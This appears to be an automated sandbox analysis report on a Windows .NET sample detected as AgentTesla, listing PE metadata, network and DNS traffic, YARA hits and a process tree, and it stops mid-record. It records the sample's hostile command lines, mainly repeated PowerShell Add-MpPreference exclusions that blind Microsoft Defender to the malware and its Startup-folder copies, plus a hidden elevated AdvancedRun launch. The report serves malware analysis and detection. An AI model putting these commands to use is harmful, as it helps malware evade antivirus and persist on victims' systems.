                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xd0cbc0x4a.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xd20000x544.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xcf8000x15b8.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xd40000xc.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xd0d060x38.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x20000xcedc40xcee00False0.560105504154data5.79350301371IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0xd20000x5440x600False0.3359375data3.71343028372IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0xd40000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                      RT_GROUP_ICON0xd20a00x6data
                                                                                                      RT_VERSION0xd20a80x49cdata

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      mscoree.dll_CorExeMain

                                                                                                      Version Infos

                                                                                                      DescriptionData
                                                                                                      Translation0x0000 0x04b0
                                                                                                      LegalCopyrightCopyright Microsoft 2010
                                                                                                      Assembly Version1.0.0.0
                                                                                                      InternalNameMicrosoft.Diagnostics.FastSerialization.dll
                                                                                                      FileVersion1.0.0.0
                                                                                                      CompanyNameMicrosoft
                                                                                                      CommentsSerialization library for TraceEvent.
                                                                                                      ProductNameMicrosoft.Diagnostics.FastSerialization
                                                                                                      ProductVersion1.0.0+1b582e2c28059cba2f163abfa7999524a19690bf
                                                                                                      FileDescriptionMicrosoft.Diagnostics.FastSerialization
                                                                                                      OriginalFilenameMicrosoft.Diagnostics.FastSerialization.dll

                                                                                                      Network Behavior

                                                                                                      Snort IDS Alerts

                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                      09/15/21-16:13:20.475091ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.1192.168.2.5

                                                                                                      Network Port Distribution

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Sep 15, 2021 16:11:07.033252954 CEST5479553192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:11:07.058275938 CEST53547958.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:11:07.464698076 CEST4955753192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:11:07.489636898 CEST53495578.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:11:07.999862909 CEST6173353192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:11:08.026587963 CEST53617338.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:11:08.655941010 CEST6544753192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:11:08.683162928 CEST53654478.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:11:09.170437098 CEST5244153192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:11:09.198179007 CEST53524418.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:11:09.391450882 CEST6217653192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:11:09.416079998 CEST53621768.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:11:10.096204996 CEST5959653192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:11:10.126585960 CEST53595968.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:11:10.813740015 CEST6529653192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:11:10.841368914 CEST53652968.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:11:11.787456989 CEST6318353192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:11:11.818392038 CEST53631838.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:11:12.521831036 CEST6015153192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:11:12.555568933 CEST53601518.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:11:13.080555916 CEST5696953192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:11:13.108076096 CEST53569698.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:11:25.128562927 CEST5516153192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:11:25.164441109 CEST53551618.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:11:38.660712004 CEST5973653192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:11:38.669083118 CEST5105853192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:11:38.686887026 CEST53597368.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:11:38.689773083 CEST5263653192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:11:38.695488930 CEST53510588.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:11:38.715930939 CEST53526368.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:12:30.583209038 CEST5475753192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:12:30.613218069 CEST53547578.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:12:34.350645065 CEST4999253192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:12:34.390721083 CEST53499928.8.8.8192.168.2.5
                                                                                                      Sep 15, 2021 16:13:20.475032091 CEST52705274192.168.2.5192.168.2.1
                                                                                                      Sep 15, 2021 16:14:09.833926916 CEST5789953192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:14:10.842112064 CEST5789953192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:14:11.862535000 CEST5789953192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:14:13.732989073 CEST5724053192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:14:13.873491049 CEST5789953192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:14:14.743556976 CEST5724053192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:14:15.758702993 CEST5724053192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:14:17.774493933 CEST5724053192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:14:17.884160042 CEST5789953192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:14:21.790395021 CEST5724053192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:14:25.913855076 CEST6076853192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:14:26.916609049 CEST6076853192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:14:27.931937933 CEST6076853192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:14:29.948160887 CEST6076853192.168.2.58.8.8.8
                                                                                                      Sep 15, 2021 16:14:33.966451883 CEST6076853192.168.2.58.8.8.8

                                                                                                      ICMP Packets

                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                      Sep 15, 2021 16:13:20.475090981 CEST192.168.2.1192.168.2.5d9c(Port unreachable)Destination Unreachable

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                      Sep 15, 2021 16:14:25.913855076 CEST192.168.2.58.8.8.80x608dStandard query (0)canonicalizer.ucsuri.tcsA (IP address)IN (0x0001)
                                                                                                      Sep 15, 2021 16:14:26.916609049 CEST192.168.2.58.8.8.80x608dStandard query (0)canonicalizer.ucsuri.tcsA (IP address)IN (0x0001)
                                                                                                      Sep 15, 2021 16:14:27.931937933 CEST192.168.2.58.8.8.80x608dStandard query (0)canonicalizer.ucsuri.tcsA (IP address)IN (0x0001)
                                                                                                      Sep 15, 2021 16:14:29.948160887 CEST192.168.2.58.8.8.80x608dStandard query (0)canonicalizer.ucsuri.tcsA (IP address)IN (0x0001)
                                                                                                      Sep 15, 2021 16:14:33.966451883 CEST192.168.2.58.8.8.80x608dStandard query (0)canonicalizer.ucsuri.tcsA (IP address)IN (0x0001)

                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      Analysis Process: lKJbVguaav.exe PID: 6396 Parent PID: 2888

                                                                                                      General

                                                                                                      Start time:16:11:12
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\Desktop\lKJbVguaav.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\Desktop\lKJbVguaav.exe'
                                                                                                      Imagebase:0xcb0000
                                                                                                      File size:856022 bytes
                                                                                                      MD5 hash:5F377DE371A8E95ACEC9956303D6F032
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.412278595.00000000040B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000000.412278595.00000000040B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.424024151.00000000056F0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.424024151.00000000056F0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.413222827.0000000004128000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000000.413222827.0000000004128000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.415536274.0000000004297000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.415536274.0000000004297000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.413677041.00000000041B7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.413677041.00000000041B7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:low

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 6676 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:16:11:21
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 6816 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:16:11:27
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 6892 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:16:11:31
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: AdvancedRun.exe PID: 6924 Parent PID: 6396

                                                                                                      General

                                                                                                      Start time:16:11:31
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                      Imagebase:0x400000
                                                                                                      File size:91000 bytes
                                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 3%, Metadefender, Browse
                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                      Reputation:moderate

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 6948 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:16:11:32
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 7056 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:16:11:32
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 7128 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:16:11:33
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: AdvancedRun.exe PID: 7164 Parent PID: 6924

                                                                                                      General

                                                                                                      Start time:16:11:34
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe' /SpecialRun 4101d8 6924
                                                                                                      Imagebase:0x400000
                                                                                                      File size:91000 bytes
                                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 6036 Parent PID: 556

                                                                                                      General

                                                                                                      Start time:16:11:35
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                      Imagebase:0x7ff797770000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 2616 Parent PID: 6396

                                                                                                      General

                                                                                                      Start time:16:11:38
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 4912 Parent PID: 2616

                                                                                                      General

                                                                                                      Start time:16:11:39
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 2952 Parent PID: 6396

                                                                                                      General

                                                                                                      Start time:16:11:39
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 3712 Parent PID: 2952

                                                                                                      General

                                                                                                      Start time:16:11:40
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 3020 Parent PID: 6396

                                                                                                      General

                                                                                                      Start time:16:11:40
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 6180 Parent PID: 3020

                                                                                                      General

                                                                                                      Start time:16:11:41
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 6192 Parent PID: 6396

                                                                                                      General

                                                                                                      Start time:16:11:41
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 3684 Parent PID: 6192

                                                                                                      General

                                                                                                      Start time:16:11:42
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 668 Parent PID: 6396

                                                                                                      General

                                                                                                      Start time:16:11:42
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: 7ADA33B7.exe PID: 6536 Parent PID: 6396

                                                                                                      General

                                                                                                      Start time:16:11:44
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe'
                                                                                                      Imagebase:0xf80000
                                                                                                      File size:856022 bytes
                                                                                                      MD5 hash:5F377DE371A8E95ACEC9956303D6F032
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 34%, Metadefender, Browse
                                                                                                      • Detection: 67%, ReversingLabs

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 6528 Parent PID: 668

                                                                                                      General

                                                                                                      Start time:16:11:45
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 6992 Parent PID: 6396

                                                                                                      General

                                                                                                      Start time:16:11:48
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 6668 Parent PID: 6396

                                                                                                      General

                                                                                                      Start time:16:11:49
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 6672 Parent PID: 6992

                                                                                                      General

                                                                                                      Start time:16:11:49
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 6820 Parent PID: 6396

                                                                                                      General

                                                                                                      Start time:16:11:50
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
